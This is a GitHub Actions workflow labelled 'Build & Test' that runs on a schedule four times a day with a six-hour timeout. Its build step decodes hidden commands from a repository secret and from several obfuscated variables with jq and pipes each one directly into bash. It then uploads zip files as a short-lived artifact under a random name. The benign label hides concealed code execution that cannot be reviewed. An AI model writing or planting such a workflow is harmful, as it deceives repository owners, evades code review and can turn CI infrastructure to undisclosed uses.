name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '47 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Build
        env:
          p7769: ${{ secrets.p7769 }}
        run: |
          printf '%s' "$p7769" | jq -r .zzi3 | /bin/bash
          echo $ms40 | jq -r .ter50 | /bin/bash
          printf '%s' "$yrjal04" | jq -r .l6 | /bin/bash
          echo $may698 | jq -r .efzws058 | /bin/bash
          echo $lflvr640 | jq -r .yx14488 | /bin/bash
          printf '%s' "$raw9" | jq -r .r6411 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: PKGUIa4K
          path: "*.zip"
          retention-days: 1
